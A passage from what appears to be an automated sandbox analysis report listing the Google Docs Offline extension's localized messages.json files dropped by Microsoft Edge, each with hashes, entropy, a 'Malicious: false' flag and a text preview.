'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
